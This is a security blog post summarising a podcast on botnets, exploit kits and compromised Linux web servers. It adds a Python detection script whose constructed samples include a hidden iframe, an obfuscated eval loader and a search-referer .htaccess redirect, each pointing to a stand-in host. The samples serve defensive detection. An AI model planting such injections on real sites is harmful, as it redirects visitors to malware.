Explaining botnets, exploit kits, Linux and Android malware (Podcast)

This year’s Security Threat Report explores how cybercriminals are becoming smarter, shadier and stealthier in their approach to infecting you with their malware. In a new Sophos Security podcast, our experts Chet Wisniewski and John Shier explain the SophosLabs research highlighted within the report.

Listen to the podcast (embedded below) to hear Chet and John discuss how the criminals operate, using sophisticated botnets and exploit kits to spread their malware. They also explain how the cybercriminals are increasingly skilled at covering their tracks.

Battle of the botnets

Despite recent successes by security companies and law enforcement in taking down botnets (networks of infected computers cybercriminals use to distribute malware and spam), the criminal gangs have found innovative ways of fighting back.

For example, efforts by Microsoft and security companies to dismantle the ZeroAccess botnet appear to have had little effect, Chet explains in the podcast.

“While I applaud organizations such as Microsoft for attempting to take down any kind of centralized component of a criminal network, the reality is we’ve got to do a better job of protecting our PCs,” Chet says.

“I think the battle of the botnets is going to be tough to win,” John says. “Their sole reason for being is to infect as many hosts as possible. And when one gets shut down, they’ll change their tactics.”

One of the largest botnets, called Zbot or Zeus, has recently been used to drop the Cryptolocker ransomware on infected machines. As John explains, a computer infected by Zbot/Zeus can be hit again and again by whatever malware the botnet operators distribute for a profit (botnets can be rented out to do the bidding of anyone with the means to pay).

New wave of exploit kits

John and Chet go on to describe how your computer might become part of a botnet: infection by drive-by web attacks from exploit kits. Although one of the most notorious exploit kits, called Blackhole, has faded in use since the arrest of its creators in October 2013, other exploit kits such as Neutrino and Redkit have emerged to take its place.

“We saw a lot of diversification of the exploit kits that came out this year,” John says. “These guys are real entrepreneurs. They saw the success Blackhole was having and decided to emulate that exploit model.”

Exploit kits, which try a series of exploits against a visitor’s browser and plugins until one of them gets through, are intimately connected to a problem many IT professionals don’t often acknowledge: compromised Linux web servers, which silently redirect their visitors to the kit.

“The vast majority of infected web servers that are directing people to these exploit kits to get infected are running Linux,” Chet explains.
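As an added example (not code from the podcast, SophosLabs or the Security Threat Report), the following Python script runs a heuristic check for the two ways a compromised web server commonly feeds visitors to an exploit kit: a hidden iframe or an obfuscated script loader injected into the pages it serves, and a conditional .htaccess rewrite that only redirects visitors arriving from a search engine (so the site owner, who types the URL directly, never sees it). The allow-list of hosts, the escape-count threshold, and the sample page and .htaccess are constructed assumptions for illustration.

```python
"""Heuristic scan for injected exploit-kit redirects on a Linux web server.

Added example written for this post; it is not code from the podcast,
SophosLabs, or the Security Threat Report. The HTML and .htaccess samples are
constructed, the allow-list is an assumption about the site being checked,
and the thresholds are assumed starting points, not a complete detector.
"""
import re
from html.parser import HTMLParser

ALLOWED_HOSTS = {"www.example.org", "cdn.example.org"}  # assumed: hosts the site legitimately loads from
MIN_ESCAPES = 16  # assumed: %xx / \xNN sequences in one script before we call it obfuscated


def _host(url):
    """Hostname of an absolute or protocol-relative URL, else None."""
    m = re.match(r"^(?:https?:)?//([^/:?#]+)", url)
    return m.group(1).lower() if m else None


class _Collector(HTMLParser):
    """Flags hidden iframes and script/iframe sources on unknown hosts."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes come through as None
        src = a.get("src", "")
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width", "").strip() in ("0", "1") or a.get("height", "").strip() in ("0", "1")
            if tiny or "display:none" in style or "visibility:hidden" in style:
                self.findings.append(("hidden_iframe", src))
        if tag in ("script", "iframe"):
            host = _host(src)
            if host and host not in ALLOWED_HOSTS:
                self.findings.append(("external_" + tag, src))


def scan_html(html):
    """Return a list of (kind, detail) findings for one page body."""
    parser = _Collector()
    parser.feed(html)
    findings = parser.findings
    # Injected loaders are typically eval/unescape over a long escaped blob.
    for m in re.finditer(r"<script[^>]*>(.*?)</script>", html, re.S | re.I):
        body = m.group(1)
        decoder = re.search(r"\b(?:eval|unescape|String\.fromCharCode)\s*\(", body)
        escapes = re.findall(r"%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}", body)
        if decoder and len(escapes) >= MIN_ESCAPES:
            findings.append(("obfuscated_script", body[:40]))
    return findings


def scan_htaccess(text):
    """Flag RewriteCond-on-referer blocks that send search-engine visitors off-site."""
    findings = []
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if not re.match(r"\s*RewriteCond\s+%\{HTTP_REFERER\}", line, re.I):
            continue
        if not re.search(r"google|bing|yahoo", line, re.I):
            continue
        for nxt in lines[i + 1:i + 4]:  # the rule follows its conditions
            m = re.match(r"\s*RewriteRule\s+\S+\s+(\S+)", nxt, re.I)
            if m:
                target = m.group(1)
                host = _host(target)
                if host and host not in ALLOWED_HOSTS:
                    findings.append(("referer_redirect", target))
                break
    return findings


# Constructed samples: a page with an injected 1x1 iframe and an escaped
# loader, and an .htaccess that only redirects people arriving from search.
SAMPLE_HTML = """<html><body><h1>Welcome</h1>
<script src="//cdn.example.org/app.js"></script>
<iframe src="http://203.0.113.7/in.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>eval(unescape("%66%75%6e%63%74%69%6f%6e%20%64%28%29%7b%7d%3b%64%28%29%3b"))</script>
</body></html>"""

SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|bing|yahoo)\. [NC]
RewriteRule .* http://203.0.113.7/go.php [R,L]
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML) + scan_htaccess(SAMPLE_HTACCESS):
        print(f"{kind:18} {detail}")
```

On a real server you would feed `scan_html` and `scan_htaccess` from a walk of the document root (and ideally from pages fetched with a search-engine Referer header, since the conditional rewrite is invisible otherwise). Treat hits as leads to verify against the deploy history, not as proof of compromise: a site legitimately using third-party widgets will trip the external-host rule until its hosts are added to the allow-list.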

Chet and John also share more insights from the Security Threat Report regarding the “breakneck speed” in the development of Android malware, and the ever-present problem of spam.

Listen to the podcast below or at soundcloud.com. And be sure to download the report to access other resources including whitepapers and videos from our experts.
